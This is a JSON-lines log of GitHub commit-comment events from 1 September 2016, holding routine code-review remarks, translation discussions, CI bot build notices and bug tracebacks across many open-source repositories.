{"id":"4502122004","type":"CommitCommentEvent","actor":{"login":"aethaniel"},"repo":{"name":"luc-github/ExperimentalCore-sam"},"payload":{"comment":{"id":18862594,"position":40,"line":98,"path":"module/variants/atmel_sam4e_xplained_pro/variant.h","commit_id":"f125d92fbd83e3ca86872180398cc375887637cd","created_at":"2016-09-01T11:59:51Z","updated_at":"2016-09-01T11:59:51Z","body":"you should have here PIN_A0 to PIN_A4, nothing else\r\nseems there is a confusion between analog pins and analog channels on a given Analog Front-End"}},"created_at":"2016-09-01T11:59:51Z"}
{"id":"4502123057","type":"CommitCommentEvent","actor":{"login":"hardik-bhalgamiya"},"repo":{"name":"hardik-bhalgamiya/demoMap"},"payload":{"comment":{"id":18862596,"position":null,"line":null,"path":null,"commit_id":"4a7faf57bfea284be5395208cd4eb951847e69f1","created_at":"2016-09-01T12:00:07Z","updated_at":"2016-09-01T12:00:07Z","body":"test"}},"created_at":"2016-09-01T12:00:07Z"}
{"id":"4502123283","type":"CommitCommentEvent","actor":{"login":"aethaniel"},"repo":{"name":"luc-github/ExperimentalCore-sam"},"payload":{"comment":{"id":18862597,"position":56,"line":110,"path":"module/variants/atmel_sam4e_xplained_pro/variant.h","commit_id":"f125d92fbd83e3ca86872180398cc375887637cd","created_at":"2016-09-01T12:00:10Z","updated_at":"2016-09-01T12:00:10Z","body":"same comment as above"}},"created_at":"2016-09-01T12:00:10Z"}
{"id":"4502123831","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18862600,"position":null,"line":null,"path":null,"commit_id":"e27cca5f09d1e5e67b645ec00debc6eafed6af25","created_at":"2016-09-01T12:00:16Z","updated_at":"2016-09-01T12:00:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 47](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12162&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-01T12:00:16Z"}
{"id":"4502124094","type":"CommitCommentEvent","actor":{"login":"pdias-cci"},"repo":{"name":"costaivo/MEAN-EmployeeReview"},"payload":{"comment":{"id":18862601,"position":9,"line":18,"path":"server/app/routes/user.js","commit_id":"9e833eafefec61439718bf13b86cae195a8946d3","created_at":"2016-09-01T12:00:19Z","updated_at":"2016-09-01T12:00:19Z","body":"> //.. Set new Password Password API\r\n\r\nUpdate the above comment."}},"created_at":"2016-09-01T12:00:19Z"}
{"id":"4502125222","type":"CommitCommentEvent","actor":{"login":"mkschreder"},"repo":{"name":"mkschreder/orangerpcd"},"payload":{"comment":{"id":18862605,"position":null,"line":null,"path":null,"commit_id":"ea57d5be8d2d14f792f80c67cd531340986bac18","created_at":"2016-09-01T12:00:34Z","updated_at":"2016-09-01T12:00:34Z","body":"Just a quick note on this one, I'm changing out my use of alloca in several\nplaces to use malloc instead. alloca allocates on stack so it is highly\nlikely it could be causing issues like this one.\n\nOn Wed, Aug 31, 2016 at 1:00 AM, Martin Schroeder <\nmkschreder.uk@googlemail.com> wrote:\n\n> Can you try latest 2.16.08 feed? I have fixed several bugs in libblobpack\n> and added some proper unit tests to it along with better code coverage. I\n> think one of the things I fixed in the process is a crash that I was\n> getting on uml builds before the fixes. Was your crash happening in any\n> code that was calling libblobpack?\n>\n> On Mon, Aug 22, 2016 at 5:33 PM, Martin Schroeder <\n> mkschreder.uk@googlemail.com> wrote:\n>\n>> Well because it segfaulted on my builds with that change (and it was very\n>> unstable) so I suspect that it is not a solution that is generic enough. I\n>> would suggest you add it as a patch in your own build for now.\n>>\n>> On 22 Aug 2016 16:41, \"Fabian Müller-Knapp\" <notifications@github.com>\n>> wrote:\n>>\n>>> Without this, v02.16.08 still segfaults on musl-libc. Can you elaborate\n>>> why you reverted this change?\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/mkschreder/orangerpcd/commit/ea57d5be8d2d14f792f80c67cd531340986bac18#commitcomment-18726029>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AERqiT3b91xyBpea9WBaRCtaHVHrUdcaks5qibUWgaJpZM4Jp8Rw>\n>>> .\n>>>\n>>\n>\n"}},"created_at":"2016-09-01T12:00:34Z"}
{"id":"4502126716","type":"CommitCommentEvent","actor":{"login":"jeanparpaillon"},"repo":{"name":"occiware/OCCInterface"},"payload":{"comment":{"id":18862609,"position":null,"line":null,"path":null,"commit_id":"8fbaf88dff844f73b35f6f297828ea598a40bd25","created_at":"2016-09-01T12:00:52Z","updated_at":"2016-09-01T12:00:52Z","body":"In the Makefile, you run the script from './scripts' dir, so current dir become 'scripts':\r\n```\r\nbuild:\r\n        cd ./scripts; \\\r\n        ./install_erocci.sh\r\n```\r\nit was a quickfix, but scripts should not depend on the location from where it runs.\r\nlet me push a change to fix this"}},"created_at":"2016-09-01T12:00:52Z"}
{"id":"4502129589","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18862615,"position":null,"line":null,"path":null,"commit_id":"e27cca5f09d1e5e67b645ec00debc6eafed6af25","created_at":"2016-09-01T12:01:32Z","updated_at":"2016-09-01T12:01:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 47](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12162&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:16"}},"created_at":"2016-09-01T12:01:32Z"}
{"id":"4502132271","type":"CommitCommentEvent","actor":{"login":"pdias-cci"},"repo":{"name":"costaivo/MEAN-EmployeeReview"},"payload":{"comment":{"id":18862622,"position":9,"line":15,"path":"client/client/constants/constants.app.js","commit_id":"b854015bff5fb1222dd38927259d56913e935ef2","created_at":"2016-09-01T12:02:09Z","updated_at":"2016-09-01T12:02:09Z","body":">  **'Incorrect password match!',**\r\n\r\nNeed a better sentence for the above statement. "}},"created_at":"2016-09-01T12:02:09Z"}
{"id":"4502134664","type":"CommitCommentEvent","actor":{"login":"guparan"},"repo":{"name":"sofa-framework/sofa"},"payload":{"comment":{"id":18862630,"position":null,"line":null,"path":null,"commit_id":"46bcd3bcdfe942dfbc336959ddd5b1ba3c84e0f9","created_at":"2016-09-01T12:02:42Z","updated_at":"2016-09-01T12:02:42Z","body":"**Warning**: This commit is NOT related to #3."}},"created_at":"2016-09-01T12:02:42Z"}
{"id":"4502135161","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":18862634,"position":4,"line":35,"path":"generators/server/templates/src/main/java/package/aop/logging/_LoggingAspect.java","commit_id":"b480a9fa828289010a37bc0e50845a5c91ea8188","created_at":"2016-09-01T12:02:49Z","updated_at":"2016-09-01T12:02:49Z","body":"Some body did a PR saying that the null is causing NPE here\n\n\nThanks & Regards,\nDeepu\n\nOn Wed, Aug 31, 2016 at 11:00 PM, Erik Kemperman <notifications@github.com>\nwrote:\n\n> Argh I should get some sleep as well. Of course it'll just be\n>\n> Throwable cause = e.getCause();\n>\n> ...and I'm not sure what is being polished with this line, but there we\n> are 👍\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jhipster/generator-jhipster/commit/b480a9fa828289010a37bc0e50845a5c91ea8188#commitcomment-18850993>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDlF0qxD-h5ELDoRNyEeN7tGzyc3bSfks5qlbobgaJpZM4Jx1AN>\n> .\n>\n"}},"created_at":"2016-09-01T12:02:49Z"}
{"id":"4502135265","type":"CommitCommentEvent","actor":{"login":"guparan"},"repo":{"name":"sofa-framework/sofa"},"payload":{"comment":{"id":18862635,"position":null,"line":null,"path":null,"commit_id":"caf96450530aa597be33e1f48f10844b2350d6ba","created_at":"2016-09-01T12:02:51Z","updated_at":"2016-09-01T12:02:51Z","body":"**Warning**: This commit is NOT related to #4."}},"created_at":"2016-09-01T12:02:51Z"}
{"id":"4502135933","type":"CommitCommentEvent","actor":{"login":"ohataken"},"repo":{"name":"ohataken/ryan"},"payload":{"comment":{"id":18862636,"position":null,"line":null,"path":null,"commit_id":"d6236949c7ad68e75a21b192bee93c9316ce9914","created_at":"2016-09-01T12:03:00Z","updated_at":"2016-09-01T12:03:00Z","body":"just run\r\n\r\n    echo \"a.out\" >> .gitignore\r\n\r\nnext: a90e08643f9735cb3c412a2e45176ef967d78d4c"}},"created_at":"2016-09-01T12:03:00Z"}
{"id":"4502139574","type":"CommitCommentEvent","actor":{"login":"ohataken"},"repo":{"name":"ohataken/ryan"},"payload":{"comment":{"id":18862647,"position":null,"line":null,"path":null,"commit_id":"a90e08643f9735cb3c412a2e45176ef967d78d4c","created_at":"2016-09-01T12:03:54Z","updated_at":"2016-09-01T12:03:54Z","body":"これから使うヘッダファイルをあらかじめincludeしておきます。また、コンパイル時の警告を抑えるためにmain関数を定義しておきました。\r\n\r\n1d56ce565b7018428eb2af65d29efca930dbc818"}},"created_at":"2016-09-01T12:03:54Z"}
{"id":"4502140236","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862648,"position":382,"line":670,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:04:04Z","updated_at":"2016-09-01T12:04:04Z","body":"`defaults to the key` の訳が抜けています。\r\n「カラムのヘッダに表示する名前 。指定しないか空の場合のデフォルト値はキー。」\r\n「カラムのヘッダに表示する名前 。指定しないか空の場合はキー。」\r\nとかでしょうか。括弧内の訳は正しいと思いますが、私は意味がよくわかってないです。"}},"created_at":"2016-09-01T12:04:04Z"}
{"id":"4502140876","type":"CommitCommentEvent","actor":{"login":"Romathonat"},"repo":{"name":"occiware/OCCInterface"},"payload":{"comment":{"id":18862650,"position":null,"line":null,"path":null,"commit_id":"8fbaf88dff844f73b35f6f297828ea598a40bd25","created_at":"2016-09-01T12:04:13Z","updated_at":"2016-09-01T12:04:13Z","body":"Nevermind, my fault. Thank you :)"}},"created_at":"2016-09-01T12:04:13Z"}
{"id":"4502141324","type":"CommitCommentEvent","actor":{"login":"devbence"},"repo":{"name":"modoboa/modoboa-pfxadmin-migrate"},"payload":{"comment":{"id":18862652,"position":null,"line":null,"path":null,"commit_id":"0784ae3757ee9f6be56f15dc60874e992a911c14","created_at":"2016-09-01T12:04:19Z","updated_at":"2016-09-01T12:04:19Z","body":"@tonioo somehow, in virtualenv i've got 1.10 django, downgraded to the specified version..\r\nsuccesfully started the import, but:\r\n\r\n> Traceback (most recent call last):\r\n>   File \"manage.py\", line 10, in <module>\r\n>     execute_from_command_line(sys.argv)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/__init__.py\", line 353, in execute_from_command_line\r\n>     utility.execute()\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/__init__.py\", line 345, in execute\r\n>     self.fetch_command(subcommand).run_from_argv(self.argv)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 348, in run_from_argv\r\n>     self.execute(*args, **cmd_options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 399, in execute\r\n>     output = self.handle(*args, **options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 290, in handle\r\n>     self._do_migration(options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 280, in _do_migration\r\n>     self._migrate_domain(pf_domain, options, creator)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 199, in _migrate_domain\r\n>     self._migrate_mailboxes(newdom, options, creator)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 179, in _migrate_mailboxes\r\n>     new_user.set_role(\"SimpleUsers\")\r\n> AttributeError: 'User' object has no attribute 'set_role'"}},"created_at":"2016-09-01T12:04:19Z"}
{"id":"4502144639","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18862659,"position":null,"line":null,"path":null,"commit_id":"f50dd6a5777c1ef6a7b0060ab7d3de6c18158ac7","created_at":"2016-09-01T12:05:06Z","updated_at":"2016-09-01T12:05:06Z","body":"also present on release-0.5 @juliabackports"}},"created_at":"2016-09-01T12:05:06Z"}
{"id":"4502145624","type":"CommitCommentEvent","actor":{"login":"tenforward"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862661,"position":367,"line":652,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:05:20Z","updated_at":"2016-09-01T12:05:20Z","body":"おお、ありがとうございます。後の例にあるように短縮形はアルファベット続けて入力可能ってことだと思います。\"ns46tS\" みたいな。"}},"created_at":"2016-09-01T12:05:20Z"}
{"id":"4502147553","type":"CommitCommentEvent","actor":{"login":"ohataken"},"repo":{"name":"ohataken/ryan"},"payload":{"comment":{"id":18862666,"position":null,"line":null,"path":null,"commit_id":"1d56ce565b7018428eb2af65d29efca930dbc818","created_at":"2016-09-01T12:05:47Z","updated_at":"2016-09-01T12:05:47Z","body":"21ea281e5b4428fa71eaf96ebbf7a316cbedbe45"}},"created_at":"2016-09-01T12:05:47Z"}
{"id":"4502147941","type":"CommitCommentEvent","actor":{"login":"jdubois"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":18862668,"position":4,"line":35,"path":"generators/server/templates/src/main/java/package/aop/logging/_LoggingAspect.java","commit_id":"b480a9fa828289010a37bc0e50845a5c91ea8188","created_at":"2016-09-01T12:05:52Z","updated_at":"2016-09-01T12:05:52Z","body":"Yes but that PR isn't clear to me. I'm not having that issue, that's why I was relunctant to merge it."}},"created_at":"2016-09-01T12:05:52Z"}
{"id":"4502148234","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"bhearsum/redo"},"payload":{"comment":{"id":18862669,"position":null,"line":null,"path":null,"commit_id":"6593444b7b43f1afbe41000c37dd0fc9c4f55397","created_at":"2016-09-01T12:05:57Z","updated_at":"2016-09-01T12:05:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PsWPFNynRgibdeP6-r7F1Q"}},"created_at":"2016-09-01T12:05:57Z"}
{"id":"4502150994","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862682,"position":394,"line":681,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:06:36Z","updated_at":"2016-09-01T12:06:36Z","body":"原文だと\r\n\r\n```\r\n\"Example: lxc list -c n,volatile.base_image:\\\"BASE IMAGE\\\":0,s46,volatile.\"\r\n\"eth0.hwaddr:MAC\\n\"\r\n```\r\n\r\nとなっているので、バックスラッシュ3つのところは1つに変更が必要でしょうか。"}},"created_at":"2016-09-01T12:06:36Z"}
{"id":"4502154614","type":"CommitCommentEvent","actor":{"login":"mvaello"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862691,"position":98,"line":363,"path":"libgdict/gdict-database-chooser.c","commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T12:07:28Z","updated_at":"2016-09-01T12:07:28Z","body":"Ok, I wasn't sure but I saw the same here: gdict-defbox.c L1254-L1257 "}},"created_at":"2016-09-01T12:07:28Z"}
{"id":"4502156923","type":"CommitCommentEvent","actor":{"login":"mvaello"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862698,"position":99,"line":364,"path":"libgdict/gdict-database-chooser.c","commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T12:08:01Z","updated_at":"2016-09-01T12:08:01Z","body":"Same as above."}},"created_at":"2016-09-01T12:08:01Z"}
{"id":"4502160095","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18862704,"position":17,"line":42,"path":"resources/materials/ultimaker_pla_silver-metallic.xml.fdm_material","commit_id":"cb1a36577c8ab6686bb1f83ced2f0e61a09bf3e2","created_at":"2016-09-01T12:08:44Z","updated_at":"2016-09-01T12:08:44Z","body":"Are these changes intentional?"}},"created_at":"2016-09-01T12:08:44Z"}
{"id":"4502160308","type":"CommitCommentEvent","actor":{"login":"luc-github"},"repo":{"name":"luc-github/ExperimentalCore-sam"},"payload":{"comment":{"id":18862705,"position":65,"line":79,"path":"module/variants/atmel_sam4e_xplained_pro/variant.cpp","commit_id":"f125d92fbd83e3ca86872180398cc375887637cd","created_at":"2016-09-01T12:08:47Z","updated_at":"2016-09-01T12:08:47Z","body":"OK Was not sure about syntax to use \r\n"}},"created_at":"2016-09-01T12:08:47Z"}
{"id":"4502163365","type":"CommitCommentEvent","actor":{"login":"mvaello"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862711,"position":null,"line":null,"path":null,"commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T12:09:34Z","updated_at":"2016-09-01T12:09:34Z","body":"Yes sorry, I was struggling with my git config :/, I have to fix it."}},"created_at":"2016-09-01T12:09:34Z"}
{"id":"4502164054","type":"CommitCommentEvent","actor":{"login":"decoratorz"},"repo":{"name":"Scalr/scalr-ctl"},"payload":{"comment":{"id":18862713,"position":84,"line":84,"path":"tests/medium/commands/internal/test_configure.py","commit_id":"e5587347d7383278cd30ee6dea6c0d67fdb26da8","created_at":"2016-09-01T12:09:44Z","updated_at":"2016-09-01T12:09:44Z","body":"Можно сократить до `set(config_data.items()) == set(valid_data.items())`"}},"created_at":"2016-09-01T12:09:44Z"}
{"id":"4502166725","type":"CommitCommentEvent","actor":{"login":"tenforward"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862720,"position":382,"line":670,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:10:23Z","updated_at":"2016-09-01T12:10:23Z","body":"ありがとうございます。特に名前(name)を指定せずにキーをそのまま表示するけど、表示幅は指定したい場合でしょうか :)"}},"created_at":"2016-09-01T12:10:23Z"}
{"id":"4502167379","type":"CommitCommentEvent","actor":{"login":"ZenGuLhe"},"repo":{"name":"ZenGuLhe/stoiLeThread"},"payload":{"comment":{"id":18862722,"position":null,"line":null,"path":null,"commit_id":"8d3831b9981a47b0c2eead7ae7d2888eaa0c6ce3","created_at":"2016-09-01T12:10:32Z","updated_at":"2016-09-01T12:10:32Z","body":"Super mise en forme les gars, franchement GG !"}},"created_at":"2016-09-01T12:10:32Z"}
{"id":"4502168585","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862726,"position":null,"line":null,"path":null,"commit_id":"3fda5383493efea251634ddedfde6d5e706d3742","created_at":"2016-09-01T12:10:48Z","updated_at":"2016-09-01T12:10:48Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/350/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T12:10:48Z"}
{"id":"4502169095","type":"CommitCommentEvent","actor":{"login":"decoratorz"},"repo":{"name":"Scalr/scalr-ctl"},"payload":{"comment":{"id":18862727,"position":58,"line":58,"path":"tests/medium/commands/internal/test_configure.py","commit_id":"e5587347d7383278cd30ee6dea6c0d67fdb26da8","created_at":"2016-09-01T12:10:55Z","updated_at":"2016-09-01T12:10:55Z","body":"А зачем тренарник? `valid_data[key] = valid_input.lower() == 'y'` will do."}},"created_at":"2016-09-01T12:10:55Z"}
{"id":"4502170908","type":"CommitCommentEvent","actor":{"login":"reschke"},"repo":{"name":"httpwg/http-extensions"},"payload":{"comment":{"id":18862731,"position":null,"line":null,"path":null,"commit_id":"3f58813b120dbedcf78d0df899b5a74e095fd068","created_at":"2016-09-01T12:11:22Z","updated_at":"2016-09-01T12:11:22Z","body":"XML_RESOURCE_ORG_PREFIX=http://unicorn-wg.github.io/idrefs kramdown-rfc2629 draft-ietf-httpbis-client-hints.md | sed -e 's/\\\"rfc2629.dtd\\\"/\\\"lib\\/rfc2629.dtd\\\"/' > draft-ietf-httpbis-client-hints.xml\r\n\r\n(erb):85:in `concat': incompatible character encodings: UTF-8 and US-ASCII (Encoding::CompatibilityError)\r\n\r\n\tfrom (erb):85:in `xml_from_sections'\r\n\r\n\tfrom /home/travis/.rvm/rubies/ruby-1.9.3-p551/lib/ruby/1.9.1/erb.rb:838:in `eval'\r\n\r\n\tfrom /home/travis/.rvm/rubies/ruby-1.9.3-p551/lib/ruby/1.9.1/erb.rb:838:in `result'\r\n\r\n...maybe an encoding problem in client-hints.md?"}},"created_at":"2016-09-01T12:11:22Z"}
{"id":"4502173779","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":18862735,"position":179,"line":422,"path":"nuxeo-runtime/nuxeo-launcher-commons/src/test/java/org/nuxeo/launcher/config/ConfigurationGeneratorTest.java","commit_id":"ffe36f0a88c16e16f86d9e634c6c745d040b3d55","created_at":"2016-09-01T12:12:04Z","updated_at":"2016-09-01T12:12:04Z","body":"I'd like to see added tests for Java 9 versions, like `9-ea+73` (-> 9.0) and `9.1.2+62` (-> 9.1), see http://openjdk.java.net/jeps/223"}},"created_at":"2016-09-01T12:12:04Z"}
{"id":"4502175184","type":"CommitCommentEvent","actor":{"login":"Tolo0"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18862739,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-01T12:12:22Z","updated_at":"2016-09-01T12:12:22Z","body":"how do i fix that error? i dont understand it"}},"created_at":"2016-09-01T12:12:22Z"}
{"id":"4502177875","type":"CommitCommentEvent","actor":{"login":"TBonnin"},"repo":{"name":"guardian/frontend"},"payload":{"comment":{"id":18862748,"position":32,"line":69,"path":"docs/01-start-here/01-installation-steps.md","commit_id":"bc7fffd121fddb48bb63b5fef092619c9a7e988f","created_at":"2016-09-01T12:12:59Z","updated_at":"2016-09-01T12:12:59Z","body":"What do you need composer creds for? @dominickendrick "}},"created_at":"2016-09-01T12:12:59Z"}
{"id":"4502179554","type":"CommitCommentEvent","actor":{"login":"jaeko44"},"repo":{"name":"jaeko44/nilavu"},"payload":{"comment":{"id":18862752,"position":16,"line":174,"path":"app/assets/stylesheets/common/base/app.scss","commit_id":"f047e41695f2f4021c97bbcb10595e86d8dd49ec","created_at":"2016-09-01T12:13:23Z","updated_at":"2016-09-01T12:13:23Z","body":"@vinomca-megam This class is not being registered in your screenshot, can you check your local files if this css class is the same as this?"}},"created_at":"2016-09-01T12:13:23Z"}
{"id":"4502180933","type":"CommitCommentEvent","actor":{"login":"ange521"},"repo":{"name":"TeamFatCat/TransferForPC"},"payload":{"comment":{"id":18862758,"position":null,"line":null,"path":null,"commit_id":"692db45c2646aaf4067e6de16e5d0b79b5d8d198","created_at":"2016-09-01T12:13:42Z","updated_at":"2016-09-01T12:13:42Z","body":"PC端我要怎么才能运行，谢谢了，麻烦告知一下"}},"created_at":"2016-09-01T12:13:42Z"}
{"id":"4502182550","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862763,"position":null,"line":null,"path":null,"commit_id":"fba1e2d194cdebf0956e78854d3b3f5962ca76f7","created_at":"2016-09-01T12:14:04Z","updated_at":"2016-09-01T12:14:04Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/351/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1926-add-fandom-logo)."}},"created_at":"2016-09-01T12:14:04Z"}
{"id":"4502186403","type":"CommitCommentEvent","actor":{"login":"KnightMiner"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":18862775,"position":9,"line":510,"path":"resources/assets/tconstruct/lang/en_US.lang","commit_id":"21e57d1484333657e7ffd9ce7177a5fcf56ffee2","created_at":"2016-09-01T12:14:55Z","updated_at":"2016-09-01T12:14:55Z","body":"Slimeleaf?"}},"created_at":"2016-09-01T12:14:55Z"}
{"id":"4502186952","type":"CommitCommentEvent","actor":{"login":"tonioo"},"repo":{"name":"modoboa/modoboa-pfxadmin-migrate"},"payload":{"comment":{"id":18862776,"position":null,"line":null,"path":null,"commit_id":"0784ae3757ee9f6be56f15dc60874e992a911c14","created_at":"2016-09-01T12:15:03Z","updated_at":"2016-09-01T12:15:03Z","body":"Should be fixed with the latest commit"}},"created_at":"2016-09-01T12:15:03Z"}
{"id":"4502188813","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862782,"position":555,"line":1080,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:15:29Z","updated_at":"2016-09-01T12:15:29Z","body":"「ディレクトリ」の部分は existing directoryとあるので「存在するディレクトリ」のほうが良いと思います。"}},"created_at":"2016-09-01T12:15:29Z"}
{"id":"4502189502","type":"CommitCommentEvent","actor":{"login":"Kizoky"},"repo":{"name":"Kizoky/Mr_SmileyII"},"payload":{"comment":{"id":18862784,"position":null,"line":null,"path":null,"commit_id":"2e12477adc770f28f50faf8d5bc5387be0288f38","created_at":"2016-09-01T12:15:38Z","updated_at":"2016-09-01T12:15:38Z","body":"I absolutely have no idea."}},"created_at":"2016-09-01T12:15:38Z"}
{"id":"4502189815","type":"CommitCommentEvent","actor":{"login":"nicolabeghin"},"repo":{"name":"ArthurHub/Android-Image-Cropper"},"payload":{"comment":{"id":18862787,"position":null,"line":null,"path":null,"commit_id":"59487fc1a5b5932fdfa92228cb297e615fde54e1","created_at":"2016-09-01T12:15:43Z","updated_at":"2016-09-01T12:15:43Z","body":"Thanks for the clarification!"}},"created_at":"2016-09-01T12:15:43Z"}
{"id":"4502197867","type":"CommitCommentEvent","actor":{"login":"Mester"},"repo":{"name":"JessicaNgo/TeleGiphy"},"payload":{"comment":{"id":18862801,"position":13,"line":64,"path":"tele_giphy/game/views.py","commit_id":"6f270949afc18ade4bbdcb2ee4ee77019ce3771f","created_at":"2016-09-01T12:17:37Z","updated_at":"2016-09-01T12:17:37Z","body":"Try to use `reverse` instead of hardcoding the url"}},"created_at":"2016-09-01T12:17:37Z"}
{"id":"4502198324","type":"CommitCommentEvent","actor":{"login":"lo56ve"},"repo":{"name":"lo56ve/somedemo"},"payload":{"comment":{"id":18862803,"position":2,"line":2,"path":"README.md","commit_id":"03fff856b7410cffb2b9318bed2e16bb0d5a2cde","created_at":"2016-09-01T12:17:43Z","updated_at":"2016-09-01T12:17:43Z","body":"- gdut（模仿广工主页）"}},"created_at":"2016-09-01T12:17:43Z"}
{"id":"4502198399","type":"CommitCommentEvent","actor":{"login":"drptbl"},"repo":{"name":"IBM-Bluemix/openwhisk-slackapp"},"payload":{"comment":{"id":18862805,"position":null,"line":null,"path":null,"commit_id":"ef461a55e5682fa01e33df55a547f7a51f3f06dc","created_at":"2016-09-01T12:17:44Z","updated_at":"2016-09-01T12:17:44Z","body":"Thank you! :)"}},"created_at":"2016-09-01T12:17:44Z"}
{"id":"4502199494","type":"CommitCommentEvent","actor":{"login":"ArthurHub"},"repo":{"name":"ArthurHub/Android-Image-Cropper"},"payload":{"comment":{"id":18862809,"position":null,"line":null,"path":null,"commit_id":"59487fc1a5b5932fdfa92228cb297e615fde54e1","created_at":"2016-09-01T12:18:00Z","updated_at":"2016-09-01T12:18:00Z","body":"Sure, huge thanks for helping with this."}},"created_at":"2016-09-01T12:18:00Z"}
{"id":"4502205092","type":"CommitCommentEvent","actor":{"login":"toolmantim"},"repo":{"name":"buildkite/elastic-ci-stack-for-aws"},"payload":{"comment":{"id":18862820,"position":null,"line":null,"path":null,"commit_id":"4f49f9a655c6cc166271cdeb3364d701ecf0cdc1","created_at":"2016-09-01T12:19:20Z","updated_at":"2016-09-01T12:19:20Z","body":"Yeah, this didn't work. I've reverted back and pushed a less silly commit"}},"created_at":"2016-09-01T12:19:20Z"}
